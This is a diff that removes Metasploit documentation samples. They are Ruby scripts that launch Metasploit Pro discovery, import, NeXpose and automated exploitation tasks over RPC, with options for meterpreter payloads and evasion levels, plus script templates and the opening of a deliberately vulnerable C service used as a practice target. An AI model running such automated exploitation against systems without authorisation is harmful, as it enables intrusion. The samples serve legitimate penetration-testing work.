-      wspaces.each_pair do |k,v|
15
-        $stderr.puts "\t#{k}"
16
-      end
17
-    end
18
-  end
19
-  $stderr.puts ""
20
-  exit(1)
21
-end
22
-
23
-opts = {}
24
-
25
-# Parse script-specific options
26
-parser = Msf::RPC::Client.option_parser(opts)
27
-parser.separator('Discover Mandatory Options:')
28
-
29
-parser.on("--project PROJECT") do |x|
30
-  opts[:project] = x
31
-end
32
-
33
-parser.on("--targets TARGETS") do |x|
34
-  opts[:targets] = [x]
35
-end
36
-
37
-parser.on("--blacklist BLACKLIST (optional)") do |x|
38
-  opts[:blacklist] = x
39
-end
40
-
41
-parser.on("--speed SPEED (optional)") do |x|
42
-  opts[:speed] = x
43
-end
44
-
45
-parser.on("--extra-ports PORTS (optional)") do |x|
46
-  opts[:extra_ports] = x
47
-end
48
-
49
-parser.on("--blacklist-ports PORTS (optional)") do |x|
50
-  opts[:blacklist_ports] = x
51
-end
52
-
53
-parser.on("--custom-ports PORTS (optional)") do |x|
54
-  opts[:custom_ports] = x
55
-end
56
-
57
-parser.on("--portscan-timeout TIMEOUT (optional)") do |x|
58
-  opts[:portscan_timeout] = x
59
-end
60
-
61
-parser.on("--source-port PORT (optional)") do |x|
62
-  opts[:source_port] = x
63
-end
64
-
65
-parser.on("--custom-nmap-options OPTIONS (optional)") do |x|
66
-  opts[:custom_nmap_options] = x
67
-end
68
-
69
-parser.on("--disable-udp-probes (optional)") do
70
-  opts[:disable_udp_probes] = true
71
-end
72
-
73
-parser.on("--disable-finger-users (optional)") do
74
-  opts[:disable_finger_users] = true
75
-end
76
-
77
-parser.on("--disable-snmp-scan (optional)") do 
78
-  opts[:disable_snmp_scan] = true
79
-end
80
-
81
-parser.on("--disable-service-identification (optional)") do
82
-  opts[:disable_service_identification] = true
83
-end
84
-
85
-parser.on("--smb-user USER (optional)") do |x|
86
-  opts[:smb_user] = x
87
-end
88
-
89
-parser.on("--smb-pass PASS (optional)") do |x|
90
-  opts[:smb_pass] = x
91
-end
92
-
93
-parser.on("--smb-domain DOMAIN (optional)") do |x|
94
-  opts[:smb_domain] = x
95
-end
96
-
97
-parser.on("--dry-run (optional)") do
98
-  opts[:dry_run] = true
99
-end
100
-
101
-parser.on("--single-scan (optional)") do
102
-  opts[:single_scan] = true
103
-end
104
-
105
-parser.on("--fast-detect (optional)") do
106
-  opts[:fast_detect] = true
107
-end
108
-
109
-parser.on("--help") do
110
-  $stderr.puts parser
111
-  exit(1)
112
-end
113
-
114
-parser.separator('')
115
-parser.parse!(ARGV)
116
-
117
-@rpc  = Msf::RPC::Client.new(opts)
118
-
119
-if not @rpc.token
120
-  $stderr.puts "Error: Invalid RPC server options specified"
121
-  $stderr.puts parser
122
-  exit(1)
123
-end
124
-
125
-# Provide default values for certain options - If there's no alternative set
126
-# use the default provided by Pro -- see the documentation.
127
-project 			= opts[:project]	|| usage(parser)
128
-targets 			= opts[:targets]	|| usage(parser)
129
-blacklist			= opts[:blacklist]
130
-speed				= opts[:speed]		|| "5"
131
-extra_ports			= opts[:extra_ports]
132
-blacklist_ports			= opts[:blacklist_ports]
133
-custom_ports			= opts[:custom_ports]
134
-portscan_timeout		= opts[:portscan_timeout]	|| 300
135
-source_port			= opts[:source_port]
136
-custom_nmap_options		= opts[:custom_nmap_options] || 
137
-disable_udp_probes		= opts[:disable_udp_probes] || false
138
-disable_finger_users		= opts[:disable_finger_users] || false
139
-disable_snmp_scan		= opts[:disable_snmp_scan] || false
140
-disable_service_identification	= opts[:disable_service_identification] || false
141
-smb_user			= opts[:smb_user] || ""
142
-smb_pass			= opts[:smb_pass] || ""
143
-smb_domain			= opts[:smb_domain] || ""
144
-single_scan			= opts[:single_scan] || false
145
-fast_detect			= opts[:fast_detect] || false
146
-
147
-# Get the default user from Pro
148
-user   		= @rpc.call("pro.default_admin_user")['username']
149
-
150
-# Create the task object with all options
151
-task 		= @rpc.call("pro.start_discover", {
152
-        'workspace'		=> project,
153
-        'username' 		=> user,
154
-        'ips'			=> targets,
155
-        'DS_BLACKLIST_HOSTS'	=> blacklist,
156
-        'DS_PORTSCAN_SPEED'	=> speed,
157
-        'DS_PORTS_EXTRA'	=> extra_ports,
158
-        'DS_PORTS_BLACKLIST'	=> blacklist_ports,
159
-        'DS_PORTS_CUSTOM'	=> custom_ports,
160
-        'DS_PORTSCAN_TIMEOUT' 	=> portscan_timeout,
161
-        'DS_PORTSCAN_SOURCE_PORT' => source_port,
162
-        'DS_CustomNmap'		=> custom_nmap_options,
163
-        'DS_UDP_PROBES'		=> disable_udp_probes,
164
-        'DS_FINGER_USERS'	=> disable_finger_users,
165
-        'DS_SNMP_SCAN'		=> disable_snmp_scan,
166
-        'DS_IDENTIFY_SERVICES'	=> disable_service_identification,
167
-        'DS_SMBUser'		=> smb_user,
168
-        'DS_SMBPass'		=> smb_pass,
169
-        'DS_SMBDomain'		=> smb_domain,
170
-        'DS_SINGLE_SCAN'	=> single_scan, 
171
-        'DS_FAST_DETECT'	=> fast_detect
172
-})
173
-
174
-puts "DEBUG: Running task with #{task.inspect}"
175
-
176
-if not task['task_id']
177
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
178
-  exit(0)
179
-end
180
-
181
-puts "[*] Creating Task ID #{task['task_id']}..."
182
-while true
183
-  select(nil, nil, nil, 0.50)
184
-
185
-  stat = @rpc.call("pro.task_status", task['task_id'])
186
-
187
-  if stat['status'] == 'invalid'
188
-    $stderr.puts "[-] Error checking task status"
189
-    exit(0)
190
-  end
191
-
192
-  info = stat[ task['task_id'] ]
193
-
194
-  if not info
195
-    $stderr.puts "[-] Error finding the task"
196
-    exit(0)
197
-  end
198
-
199
-  if info['status'] == "error"
200
-    $stderr.puts "[-] Error generating report: #{info['error']}"
201
-    exit(0)
202
-  end
203
-
204
-  break if info['progress'] == 100
205
-end
206
-
207
-$stdout.puts "[+] Task Complete!"

+ 0
- 225
documentation/samples/pro/msfrpc_pro_exploit.rb View File

@@ -1,225 +0,0 @@
1
-#!/usr/bin/env ruby
2
-require 'rubygems'
3
-require 'optparse'
4
-require 'msfrpc-client'
5
-require 'rex/ui'
6
-
7
-def usage(ropts)
8
-  $stderr.puts ropts
9
-
10
-  if @rpc and @rpc.token
11
-    wspaces = @rpc.call("pro.workspaces") rescue {}
12
-    if wspaces.keys.length > 0
13
-      $stderr.puts "Active Projects:"
14
-      wspaces.each_pair do |k,v|
15
-        $stderr.puts "\t#{k}"
16
-      end
17
-    end
18
-  end
19
-  $stderr.puts ""
20
-  exit(1)
21
-end
22
-
23
-opts = {}
24
-opts[:blacklist]      = ''
25
-opts[:whitelist_ports] = ''
26
-opts[:blacklist_ports] = ''
27
-opts[:exploit_timeout] = 5
28
-opts[:limit_sessions] = true
29
-opts[:ignore_fragile_devices] = true
30
-opts[:filter_by_os]   = true
31
-opts[:only_match]     = false
32
-opts[:match_vulns]    = true
33
-opts[:match_ports]    = true
34
-opts[:payload_method] = "auto"
35
-opts[:payload_type]   = "meterpreter"
36
-opts[:payload_ports]  = "4000-5000"
37
-opts[:evasion_level_tcp] = 0
38
-opts[:evasion_level_app] = 0
39
-opts[:module_filter] = ''
40
-
41
-# Parse script-specific options
42
-parser = Msf::RPC::Client.option_parser(opts)
43
-parser.separator('Exploit Specific Options:')
44
-
45
-parser.on("--project PROJECT") do |x|
46
-  opts[:project] = x
47
-end
48
-
49
-parser.on("--targets TARGETS") do |x|
50
-  opts[:targets] = x
51
-end
52
-
53
-parser.on("--speed SPEED") do |x|
54
-  opts[:speed] = x
55
-end
56
-
57
-parser.on("--minimum-rank RANK") do |x|
58
-  opts[:rank] = x
59
-end
60
-
61
-parser.on("--blacklist BLACKLIST (optional)") do |x|
62
-  opts[:blacklist] = x
63
-end
64
-
65
-parser.on("--whitelist-ports PORTS (optional)") do |x|
66
-  opts[:whitelist_ports] = x
67
-end
68
-
69
-parser.on("--blacklist-ports PORTS (optional)") do |x|
70
-  opts[:blacklist_ports] = x
71
-end
72
-
73
-parser.on("--exploit-timeout TIMEOUT (optional)") do |x|
74
-  opts[:exploit_timeout] = x
75
-end
76
-
77
-parser.on("--limit-sessions (optional)") do |x|
78
-  opts[:limit_sessions] = (x =~ /^(y|t|1)/i ? true : false )
79
-end
80
-
81
-parser.on("--ignore-fragile-devices (optional)") do |x|
82
-  opts[:ignore_fragile_devices] = (x =~ /^(y|t|1)/i ? true : false )
83
-end
84
-
85
-parser.on("--filter-by-os (optional)") do |x|
86
-  opts[:filter_by_os] = (x =~ /^(y|t|1)/i ? true : false )
87
-end
88
-
89
-parser.on("--dry-run (optional)") do |x|
90
-  opts[:only_match] = (x =~ /^(y|t|1)/i ? true : false )
91
-end
92
-
93
-parser.on("--match-vulns (optional)") do |x|
94
-  opts[:match_vulns] = (x =~ /^(y|t|1)/i ? true : false )
95
-end
96
-
97
-parser.on("--match-ports (optional)") do |x|
98
-  opts[:match_ports] = (x =~ /^(y|t|1)/i ? true : false )
99
-end
100
-
101
-parser.on("--payload-method AUTO|REVERSE|BIND (optional)") do |x|
102
-  opts[:payload_method] = x
103
-end
104
-
105
-parser.on("--payload-type METERPRETER|SHELL (optional)") do |x|
106
-  opts[:payload_type] = x
107
-end
108
-
109
-parser.on("--payload-ports PORTS (optional)") do |x|
110
-  opts[:payload_ports] = x
111
-end
112
-
113
-parser.on("--evasion-level-tcp LEVEL (optional)") do |x|
114
-  opts[:evasion_level_tcp] = x
115
-end
116
-
117
-parser.on("--evasion-level-app LEVEL (optional)") do |x|
118
-  opts[:evasion_level_app] = x
119
-end
120
-
121
-parser.on("--module-filter FILTER (optional)") do |x|
122
-  opts[:module_filter] = x
123
-end
124
-
125
-parser.on("--help") do
126
-  $stderr.puts parser
127
-  exit(1)
128
-end
129
-
130
-parser.separator('')
131
-parser.parse!(ARGV)
132
-
133
-@rpc  = Msf::RPC::Client.new(opts)
134
-
135
-if not @rpc.token
136
-  $stderr.puts "Error: Invalid RPC server options specified"
137
-  $stderr.puts parser
138
-  exit(1)
139
-end
140
-
141
-# Store the user's settings
142
-project 			= opts[:project]	|| usage(parser)
143
-targets 			= opts[:targets]	|| usage(parser)
144
-rank				= opts[:rank]		|| usage(parser)
145
-speed				= opts[:speed]		|| usage(parser)
146
-blacklist			= opts[:blacklist]
147
-whitelist_ports			= opts[:whitelist_ports]
148
-blacklist_ports			= opts[:blacklist_ports]
149
-exploit_timeout			= opts[:exploit_timeout] 
150
-limit_sessions			= opts[:limit_sessions]
151
-ignore_fragile_devices		= opts[:ignore_fragile_devices] 
152
-filter_by_os			= opts[:filter_by_os]
153
-only_match			= opts[:only_match]
154
-match_vulns			= opts[:match_vulns]
155
-match_ports			= opts[:match_ports]
156
-payload_method			= opts[:payload_method]
157
-payload_type			= opts[:payload_type]
158
-payload_ports			= opts[:payload_ports]
159
-evasion_level_tcp		= opts[:evasion_level_tcp]
160
-evasion_level_app		= opts[:evasion_level_app]
161
-module_filter			= opts[:module_filter]
162
-#===
163
-
164
-# Get the default user
165
-user   		= @rpc.call("pro.default_admin_user")['username']
166
-
167
-# Create the task object with all options
168
-task 		= @rpc.call("pro.start_exploit", {
169
-        'workspace'			=> project,
170
-        'username' 			=> user,
171
-        'DS_WHITELIST_HOSTS'		=> targets,
172
-        'DS_BLACKLIST_HOSTS'		=> blacklist,
173
-        'DS_WHITELIST_PORTS'    	=> whitelist_ports,
174
-        'DS_BLACKLIST_PORTS'		=> blacklist_ports, 
175
-        'DS_MinimumRank' 		=> rank, 
176
-        'DS_EXPLOIT_SPEED'		=> speed, 
177
-        'DS_EXPLOIT_TIMEOUT'		=> exploit_timeout,
178
-        'DS_LimitSessions'		=> limit_sessions,
179
-        'DS_IgnoreFragileDevices' 	=> ignore_fragile_devices, 
180
-        'DS_FilterByOS'			=> filter_by_os, 
181
-        'DS_OnlyMatch'			=> only_match,
182
-        'DS_MATCH_VULNS'		=> match_vulns,
183
-        'DS_MATCH_PORTS'		=> match_ports, 
184
-        'DS_PAYLOAD_METHOD'		=> payload_method, 
185
-        'DS_PAYLOAD_TYPE'		=> payload_type, 
186
-        'DS_PAYLOAD_PORTS'		=> payload_ports, 
187
-        'DS_EVASION_LEVEL_TCP'		=> evasion_level_tcp, 
188
-        'DS_EVASION_LEVEL_APP'		=> evasion_level_app,
189
-        'DS_ModuleFilter'		=> module_filter
190
-})
191
-
192
-puts "DEBUG: Running task with #{task.inspect}"
193
-
194
-if not task['task_id']
195
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
196
-  exit(0)
197
-end
198
-
199
-puts "[*] Creating Task ID #{task['task_id']}..."
200
-while true
201
-  select(nil, nil, nil, 0.50)
202
-
203
-  stat = @rpc.call("pro.task_status", task['task_id'])
204
-
205
-  if stat['status'] == 'invalid'
206
-    $stderr.puts "[-] Error checking task status"
207
-    exit(0)
208
-  end
209
-
210
-  info = stat[ task['task_id'] ]
211
-
212
-  if not info
213
-    $stderr.puts "[-] Error finding the task"
214
-    exit(0)
215
-  end
216
-
217
-  if info['status'] == "error"
218
-    $stderr.puts "[-] Error generating report: #{info['error']}"
219
-    exit(0)
220
-  end
221
-
222
-  break if info['progress'] == 100
223
-end
224
-
225
-$stdout.puts "[+] Task Complete!"

+ 0
- 91
documentation/samples/pro/msfrpc_pro_import.rb View File

@@ -1,91 +0,0 @@
1
-#!/usr/bin/env ruby
2
-require 'rubygems'
3
-require 'optparse'
4
-require 'msfrpc-client'
5
-require 'rex/ui'
6
-
7
-def usage(ropts)
8
-  $stderr.puts ropts
9
-
10
-  if @rpc and @rpc.token
11
-    wspaces = @rpc.call("pro.workspaces") rescue {}
12
-    if wspaces.keys.length > 0
13
-      $stderr.puts "Active Projects:"
14
-      wspaces.each_pair do |k,v|
15
-        $stderr.puts "\t#{k}"
16
-      end
17
-    end
18
-  end
19
-  exit(1)
20
-end
21
-
22
-opts = {}
23
-
24
-# Parse script-specific options
25
-parser = Msf::RPC::Client.option_parser(opts)
26
-parser.separator('Task Options:')
27
-
28
-parser.on("--path PATH") do |path|
29
-  opts[:path] = path
30
-end
31
-
32
-parser.on("--project PROJECT") do |project|
33
-  opts[:project] = project
34
-end
35
-
36
-parser.on("--help") do
37
-  $stderr.puts parser
38
-  exit(1)
39
-end
40
-parser.separator('')
41
-
42
-parser.parse!(ARGV)
43
-@rpc  = Msf::RPC::Client.new(opts)
44
-
45
-if not @rpc.token
46
-  $stderr.puts "Error: Invalid RPC server options specified"
47
-  $stderr.puts parser
48
-  exit(1)
49
-end
50
-
51
-project 	= opts[:project] 	|| usage(parser)
52
-path 		= opts[:path]		|| usage(parser)
53
-user  		= @rpc.call("pro.default_admin_user")['username']
54
-task 		= @rpc.call("pro.start_import", {
55
-      'workspace'		=> project,
56
-      'username' 		=> user,
57
-      'DS_PATH'		=> path
58
-})
59
-
60
-if not task['task_id']
61
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
62
-  exit(0)
63
-end
64
-
65
-puts "[*] Creating Task ID #{task['task_id']}..."
66
-while true
67
-  select(nil, nil, nil, 0.50)
68
-
69
-  stat = @rpc.call("pro.task_status", task['task_id'])
70
-
71
-  if stat['status'] == 'invalid'
72
-    $stderr.puts "[-] Error checking task status"
73
-    exit(0)
74
-  end
75
-
76
-  info = stat[ task['task_id'] ]
77
-
78
-  if not info
79
-    $stderr.puts "[-] Error finding the task"
80
-    exit(0)
81
-  end
82
-
83
-  if info['status'] == "error"
84
-    $stderr.puts "[-] Error generating report: #{info['error']}"
85
-    exit(0)
86
-  end
87
-
88
-  break if info['progress'] == 100
89
-end
90
-
91
-$stdout.puts "[+] Task Complete!"

+ 0
- 148
documentation/samples/pro/msfrpc_pro_nexpose.rb View File

@@ -1,148 +0,0 @@
1
-#!/usr/bin/env ruby
2
-require 'rubygems'
3
-require 'optparse'
4
-require 'msfrpc-client'
5
-require 'rex/ui'
6
-
7
-def usage(ropts)
8
-  $stderr.puts ropts
9
-
10
-  if @rpc and @rpc.token
11
-    wspaces = @rpc.call("pro.workspaces") rescue {}
12
-    if wspaces.keys.length > 0
13
-      $stderr.puts "Active Projects:"
14
-      wspaces.each_pair do |k,v|
15
-        $stderr.puts "\t#{k}"
16
-      end
17
-    end
18
-  end
19
-  $stderr.puts ""
20
-  exit(1)
21
-end
22
-
23
-opts = {}
24
-
25
-# Parse script-specific options
26
-parser = Msf::RPC::Client.option_parser(opts)
27
-parser.separator('NeXpose Specific Options:')
28
-
29
-parser.on("--project PROJECT") do |x|
30
-  opts[:project] = x
31
-end
32
-
33
-parser.on("--targets TARGETS") do |x|
34
-  opts[:targets] = [x]
35
-end
36
-
37
-parser.on("--nexpose-host HOST") do |x|
38
-  opts[:nexpose_host] = x
39
-end
40
-
41
-parser.on("--nexpose-user USER") do |x|
42
-  opts[:nexpose_user] = x
43
-end
44
-
45
-parser.on("--nexpose-pass PASSWORD") do |x|
46
-  opts[:nexpose_pass] = x
47
-end
48
-
49
-parser.on("--nexpose-pass-file PATH") do |x|
50
-  opts[:nexpose_pass_file] = x
51
-end
52
-
53
-parser.on("--scan-template TEMPLATE (optional)") do |x|
54
-  opts[:scan_template] = x
55
-end
56
-
57
-parser.on("--nexpose-port PORT (optional)") do |x|
58
-  opts[:nexpose_port] = x
59
-end
60
-
61
-parser.on("--blacklist BLACKLIST (optional)") do |x|
62
-  opts[:blacklist] = x
63
-end
64
-
65
-parser.on("--help") do
66
-  $stderr.puts parser
67
-  exit(1)
68
-end
69
-
70
-parser.separator('')
71
-parser.parse!(ARGV)
72
-
73
-@rpc  = Msf::RPC::Client.new(opts)
74
-
75
-if not @rpc.token
76
-  $stderr.puts "Error: Invalid RPC server options specified"
77
-  $stderr.puts parser
78
-  exit(1)
79
-end
80
-
81
-# Get the password from the file
82
-if opts[:nexpose_pass_file]
83
-  nexpose_pass = File.open(opts[:nexpose_pass_file],"r").read.chomp!
84
-else
85
-  nexpose_pass = opts[:nexpose_pass] || usage(parser)
86
-end
87
-
88
-# Store the user's settings
89
-project 			= opts[:project]		|| usage(parser),
90
-targets 			= opts[:targets]		|| usage(parser),
91
-blacklist			= opts[:blacklist],
92
-nexpose_host			= opts[:nexpose_host] 		|| usage(parser),
93
-nexpose_port			= opts[:nexpose_port]		|| "3780",
94
-nexpose_user			= opts[:nexpose_user]		|| "nxadmin"
95
-scan_template			= opts[:scan_template]		|| "pentest-audit"
96
-
97
-# Get the default user
98
-user   		= @rpc.call("pro.default_admin_user")['username']
99
-
100
-options = {
101
-        'workspace'			=> project,
102
-        'username' 			=> user,
103
-        'DS_WHITELIST_HOSTS'		=> targets,
104
-        'DS_NEXPOSE_HOST'		=> nexpose_host,
105
-        'DS_NEXPOSE_PORT'		=> nexpose_port,
106
-        'DS_NEXPOSE_USER'		=> nexpose_user,
107
-        'nexpose_pass'			=> nexpose_pass,
108
-        'DS_SCAN_TEMPLATE'		=> scan_template
109
-}
110
-
111
-puts "DEBUG: Running task with #{options}"
112
-
113
-# Create the task object with all options
114
-task 		= @rpc.call("pro.start_exploit", options)
115
-
116
-
117
-if not task['task_id']
118
-  $stderr.puts "[-] Error starting the task: #{task.inspect}"
119
-  exit(0)
120
-end
121
-
122
-puts "[*] Creating Task ID #{task['task_id']}..."
123
-while true
124
-  select(nil, nil, nil, 0.50)
125
-
126
-  stat = @rpc.call("pro.task_status", task['task_id'])
127
-
128
-  if stat['status'] == 'invalid'
129
-    $stderr.puts "[-] Error checking task status"
130
-    exit(0)
131
-  end
132
-
133
-  info = stat[ task['task_id'] ]
134
-
135
-  if not info
136
-    $stderr.puts "[-] Error finding the task"
137
-    exit(0)
138
-  end
139
-
140
-  if info['status'] == "error"
141
-    $stderr.puts "[-] Error generating report: #{info['error']}"
142
-    exit(0)
143
-  end
144
-
145
-  break if info['progress'] == 100
146
-end
147
-
148
-$stdout.puts "[+] Task Complete!"

+ 0
- 43
documentation/samples/scripts/meterpreter_script_template.rb View File

@@ -1,43 +0,0 @@
1
-# $Id$
2
-# $Revision$
3
-# Author: 
4
-#-------------------------------------------------------------------------------
5
-################## Variable Declarations ##################
6
-
7
-@client = client
8
-sample_option_var = nil
9
-@exec_opts = Rex::Parser::Arguments.new(
10
-  "-h" => [ false, "Help menu." ],
11
-  "-o" => [ true , "Option that requieres a value"]
12
-  )
13
-meter_type = client.platform
14
-
15
-################## Function Declarations ##################
16
-
17
-# Usage Message Function
18
-#-------------------------------------------------------------------------------
19
-def usage
20
-  print_line "Meterpreter Script for INSERT PURPOSE."
21
-  print_line(@exec_opts.usage)
22
-  raise Rex::Script::Completed
23
-end
24
-
25
-# Wrong Meterpreter Version Message Function
26
-#-------------------------------------------------------------------------------
27
-def wrong_meter_version(meter = meter_type)
28
-  print_error("#{meter} version of Meterpreter is not supported with this Script!")
29
-  raise Rex::Script::Completed
30
-end
31
-
32
-################## Main ##################
33
-@exec_opts.parse(args) { |opt, idx, val|
34
-  case opt
35
-  when "-h"
36
-    usage
37
-  when "-o"
38
-    sample_option_var = val
39
-  end
40
-}
41
-
42
-# Check for Version of Meterpreter
43
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64|java|php|linux/i # Remove none supported versions

+ 0
- 132
documentation/samples/scripts/resource_script.rb View File

@@ -1,132 +0,0 @@
1
-<ruby>
2
-##
3
-# This file is part of the Metasploit Framework and may be subject to
4
-# redistribution and commercial restrictions. Please see the Metasploit
5
-# Framework web site for more information on licensing and terms of use.
6
-#   http://metasploit.com/framework/
7
-##
8
-
9
-#
10
-# Put your 'require' here
11
-#
12
-
13
-#
14
-# RC files currently have no 'modinfo' like a real Metasploit module, so this help message
15
-# will have to do the trick for now.
16
-#
17
-def help
18
-  msg = %Q|
19
-  Description:
20
-    Let's describe what this RC script is all about, plus anything the user should know before
21
-    actually using it.
22
-
23
-  Usage:
24
-    msfconsole -r <rc file> <db_user> <db_pass> <db_workspace> <arg1>
25
-
26
-  Options:
27
-    <rc file>      - I'm sure you already know
28
-    <db_user>      - Username for the database  (datastore: 'DB_USER')
29
-    <db_pass>      - Password for the database  (datastore: 'DB_PASS')
30
-    <db_workspace> - Workspace for the database (datastore: 'DB_WORKSPACE')
31
-    <arg1>         - Argument 1                 (datastore: 'ARG1')
32
-
33
-  Authors:
34
-    sinn3r <sinn3r[at]metasploit.com>
35
-  |
36
-
37
-  msg = msg.gsub(/^\t/, '')
38
-  print_line(msg)
39
-end
40
-
41
-
42
-#
43
-# See if we're already connected
44
-#
45
-def is_db_active?
46
-  begin
47
-    framework.db.hosts
48
-    return true
49
-  rescue ::ActiveRecord::ConnectionNotEstablished
50
-    return false
51
-  end
52
-end
53
-
54
-
55
-#
56
-# Initialize the database.
57
-# Default to localhost:5432, as this is the default configuration suggested by the manual.
58
-#
59
-def init_db(username, password, workspace)
60
-  db = "localhost:5432"
61
-  print_status("Opening #{workspace} at #{db}")
62
-  run_single("db_connect #{username}:#{password}@#{db}/#{workspace}")
63
-end
64
-
65
-
66
-#
67
-# Initialize the argumets here
68
-#
69
-def init_args
70
-  args = {}
71
-
72
-  joint = ARGV.join('')
73
-  if joint =~ /^help$/i
74
-    args[:help] = true
75
-    return args
76
-  end
77
-
78
-  # Add more arguments according to your help() function
79
-  datastore = framework.datastore
80
-  args[:db_user]      = ARGV.shift || datastore['DB_USER'] || ''
81
-  args[:db_pass]      = ARGV.shift || datastore['DB_PASS'] || ''
82
-  args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
83
-  args[:arg1]         = ARGV.shift || datastore['ARG1'] || ''
84
-
85
-  if not is_db_active?
86
-    if args[:db_user].empty? or args[:db_pass].empty? or args[:db_workspace].empty?
87
-      raise ArgumentError, "Need DB_USER, DB_PASS, and DB_WORKSPACE"
88
-    end
89
-  end
90
-
91
-  raise ArgumentError, "Need ARG1" if args[:arg1].empty?
92
-
93
-  return args
94
-end
95
-
96
-
97
-#
98
-# This is your main function
99
-#
100
-def main(args)
101
-  print_status("Initialzation is done, and here's your input: #{args[:arg1]}")
102
-end
103
-
104
-
105
-#
106
-# Below initializes the arguments and database
107
-#
108
-begin
109
-  args = init_args
110
-  if args[:help]
111
-    help
112
-    return
113
-  end
114
-
115
-  init_db(args[:db_user], args[:db_pass], args[:db_workspace]) if not is_db_active?
116
-  main(args)
117
-
118
-rescue ArgumentError => e
119
-  print_error("Bad argument(s): #{e.message}")
120
-  return
121
-
122
-rescue RuntimeError => e
123
-  # Any runtime error should be raised as "RuntimeError"
124
-  print_error(e.message)
125
-  return
126
-
127
-rescue ::Exception => e
128
-  # Whatever unknown exception occurs, we raise it
129
-  raise e
130
-end
131
-
132
-</ruby>

+ 0
- 5
documentation/samples/vulnapps/exploitme-posix/Makefile View File

@@ -1,5 +0,0 @@
1
-all:	exploitmel
2
-exploitmel:	exploitme-posix.c
3
-	gcc -W -Wall $< -o $@
4
-clean:
5
-	rm exploitmel

+ 0
- 105
documentation/samples/vulnapps/exploitme-posix/exploitme-posix.c View File

@@ -1,105 +0,0 @@
1
-/* exploitme coded in a hurry by Yoann Guillot and Julien Tinnes, used 'man select_tut' as skeleton */
2
-#include <stdlib.h>
3
-#include <stdio.h>
4
-#include <unistd.h>
5
-#include <sys/time.h>
6
-#include <sys/types.h>
7
-#include <string.h>
8
-#include <signal.h>
9
-#include <sys/socket.h>
10
-#include <netinet/in.h>
11
-#include <arpa/inet.h>
12
-#include <errno.h>
13
-#include <sys/mman.h>
14
-#include <malloc.h>
15
-
16
-#define LISTEN_PORT 4545
17
-
18
-int	vuln(void) {
19
-	struct sockaddr_in a;
20
-	int s, mysock;
21
-	int yes, ret, pagesize;
22
-	void *buf;
23
-
24
-	pagesize = sysconf(_SC_PAGE_SIZE);
25
-	if (pagesize == -1) {
26
-		perror("pagesize");
27
-		return -1;
28
-	}
29
-
30
-	if (pagesize < 4096)
31
-		pagesize=(4096/pagesize+1)*pagesize;
32
-	printf("Detected pagesize: %d\n", pagesize);
33
-	buf=memalign(pagesize, pagesize);
34
-	if (buf == NULL) {
35
-		perror("memalign");
36
-		return -1;
37
-	}
38
-	if ((s = socket (AF_INET, SOCK_STREAM, 0)) < 0) {
39
-		perror ("socket");
40
-		return -1;
41
-	}
42
-	yes = 1;
43
-	if (setsockopt
44
-			(s, SOL_SOCKET, SO_REUSEADDR,
45
-			 (char *) &yes, sizeof (yes)) < 0) {
46
-		perror ("setsockopt");
47
-		close (s);
48